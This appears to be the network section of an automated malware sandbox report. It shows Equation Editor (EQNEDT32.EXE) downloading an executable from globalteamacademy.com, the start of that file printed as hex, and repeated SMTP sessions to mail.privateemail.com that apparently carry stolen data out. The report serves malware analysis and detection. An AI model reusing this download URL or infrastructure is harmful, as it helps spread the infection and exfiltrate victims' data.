Feb 8, 2021 10:29:51.573329926 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.573497057 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.577825069 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.761326075 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.761348009 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.761435986 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.761544943 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.761692047 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.761771917 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.766191006 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.766284943 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.949831009 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.950016022 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.950098038 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.950149059 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.954588890 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.954607010 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:51.954772949 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:51.954823017 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.139307022 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.139349937 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.139668941 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.143204927 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.143234968 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.143405914 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.143481016 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.328327894 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.328377008 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.328402996 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.328428984 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.328454971 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.328619957 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.328665972 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.331898928 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.331942081 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.331967115 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.331993103 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.332019091 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.332043886 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.332093000 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.333398104 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.517549992 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517596006 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517625093 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517651081 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517677069 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517703056 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517729044 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517754078 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.517818928 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.519026041 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.520499945 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.520529985 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.520555973 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.521758080 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.521785975 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.521795034 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.521975994 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.522003889 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.522027969 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.522084951 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.522155046 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.522222042 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.522248030 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.522463083 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:52.706403971 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707515001 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707545042 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707608938 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707699060 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707745075 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707763910 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707781076 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.707869053 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710129023 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710167885 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710282087 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710311890 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710536003 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710566044 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710652113 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710680008 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.710705996 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.719321012 CET	587	49173	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:52.925194025 CET	49173	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:55.951189995 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.140196085 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.140393972 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.330127954 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.330699921 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.519062042 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.519401073 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.519946098 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.711216927 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.712203026 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.900744915 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.900789022 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:56.903156996 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:56.911477089 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:57.091625929 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.091670036 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.099910021 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.100493908 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.100975990 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:57.289424896 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.290549994 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.291896105 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:57.481990099 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.484390974 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.485194921 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:57.676004887 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.678432941 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.678896904 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:57.867486000 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.887758017 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:57.888561964 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.077202082 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.077580929 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.078635931 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.079135895 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.079385042 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.079657078 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.087639093 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.267128944 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.267376900 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.267550945 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.267724037 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.268040895 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.268151999 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.276201963 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.276405096 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.455928087 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.456180096 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.456523895 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.456633091 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.464929104 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.464967966 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.465089083 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.647295952 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.647353888 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.647567987 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.656095028 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.656380892 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.836231947 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836307049 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836353064 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836390972 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836425066 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836461067 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.836576939 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.836627960 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.836653948 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.844806910 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.844949961 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:58.845118999 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.845261097 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.845319033 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.845356941 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:58.846040964 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.025181055 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025289059 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025353909 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025456905 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025479078 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.025543928 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025579929 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025614023 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025649071 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025841951 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025902987 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.025938988 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.026978016 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.033638954 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.033675909 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.033835888 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.033873081 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034512043 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034544945 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034631014 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034682989 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034723043 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.034892082 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035109043 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.035207033 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035242081 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035264969 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.035305977 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035341024 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035375118 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.035445929 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.035650969 CET	49174	587	192.168.2.22	198.54.122.60
Feb 8, 2021 10:29:59.214046001 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215523958 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215603113 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215655088 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215682030 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215723991 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215765953 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215794086 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215918064 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.215943098 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.223854065 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.223970890 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224008083 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224037886 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224062920 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224143982 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224265099 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224463940 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224540949 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.224663019 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.233002901 CET	587	49174	198.54.122.60	192.168.2.22
Feb 8, 2021 10:29:59.430957079 CET	49174	587	192.168.2.22	198.54.122.60

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2021 10:28:18.120815992 CET	52197	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:28:18.410446882 CET	53	52197	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:15.805115938 CET	53099	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:15.868436098 CET	53	53099	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:21.925395012 CET	52838	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:21.982553005 CET	53	52838	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:21.983606100 CET	52838	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:22.033673048 CET	53	52838	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:23.864960909 CET	61200	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:23.924849987 CET	53	61200	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:23.938626051 CET	49548	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:24.000092983 CET	53	49548	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:29.920811892 CET	55627	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:29.969630957 CET	53	55627	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:39.189776897 CET	56009	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:39.251398087 CET	53	56009	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:49.391611099 CET	61865	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:49.443464994 CET	53	61865	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:55.834018946 CET	55171	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:55.891032934 CET	53	55171	8.8.8.8	192.168.2.22
Feb 8, 2021 10:29:55.891953945 CET	55171	53	192.168.2.22	8.8.8.8
Feb 8, 2021 10:29:55.948849916 CET	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 8, 2021 10:28:18.120815992 CET	192.168.2.22	8.8.8.8	0x51f2	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:15.805115938 CET	192.168.2.22	8.8.8.8	0x651c	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:21.925395012 CET	192.168.2.22	8.8.8.8	0x8b18	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:21.983606100 CET	192.168.2.22	8.8.8.8	0x8b18	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:29.920811892 CET	192.168.2.22	8.8.8.8	0x12a7	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:39.189776897 CET	192.168.2.22	8.8.8.8	0x4734	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:49.391611099 CET	192.168.2.22	8.8.8.8	0xc366	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:55.834018946 CET	192.168.2.22	8.8.8.8	0xfd61	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:55.891953945 CET	192.168.2.22	8.8.8.8	0xfd61	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 8, 2021 10:28:18.410446882 CET	8.8.8.8	192.168.2.22	0x51f2	No error (0)	globalteamacademy.com	43.252.37.193	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:15.868436098 CET	8.8.8.8	192.168.2.22	0x651c	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:21.982553005 CET	8.8.8.8	192.168.2.22	0x8b18	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:22.033673048 CET	8.8.8.8	192.168.2.22	0x8b18	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:29.969630957 CET	8.8.8.8	192.168.2.22	0x12a7	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:39.251398087 CET	8.8.8.8	192.168.2.22	0x4734	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:49.443464994 CET	8.8.8.8	192.168.2.22	0xc366	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:55.891032934 CET	8.8.8.8	192.168.2.22	0xfd61	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 10:29:55.948849916 CET	8.8.8.8	192.168.2.22	0xfd61	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

globalteamacademy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 8, 2021 10:28:18.638580084 CET	0	OUT	GET /showcase/pal/TrC86HH4pxVZ49N.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: globalteamacademy.com Connection: Keep-Alive
Feb 8, 2021 10:28:18.852696896 CET	2	IN	HTTP/1.1 200 OK Date: Mon, 08 Feb 2021 09:28:20 GMT Server: Apache Last-Modified: Mon, 08 Feb 2021 03:31:11 GMT Accept-Ranges: bytes Content-Length: 734720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a af 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 20 0b 00 00 14 00 00 00 00 00 00 3e 3e 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 3d 0b 00 57 00 00 00 00 40 0b 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1e 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 12 00 00 00 40 0b 00 00 12 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 24 0a 00 5c 19 01 00 03 00 00 00 01 00 00 06 28 e1 00 00 60 43 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 16 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 19 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 1e 00 00 0a 2b 01 17 0b 07 39 d8 00 00 00 7e 06 00 00 04 14 fe 03 0c 08 2c 32 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 6f 20 00 00 0a 0d 09 2c 16 72 01 00 00 70 16 8d 18 00 00 01 28 21 00 00 0a 73 22 00 00 0a 7a 00 00 2b 0c 00 73 23 00 00 0a 80 06 00 00 04 00 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 14 6f 24 00 00 0a 00 00 28 01 00 00 2b 0a de 74 75 14 00 00 01 25 2d 04 26 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ` >> @ @=W@` H.textD `.rsrc@"@@.reloc`4@B >H$\(`C0(((o(((((N(o(&(sssss0~o+0~o+0~o+0~o+0~o+0,o+9~,2~(o ,rp(!s"z+s#~(o$(+tu%-&
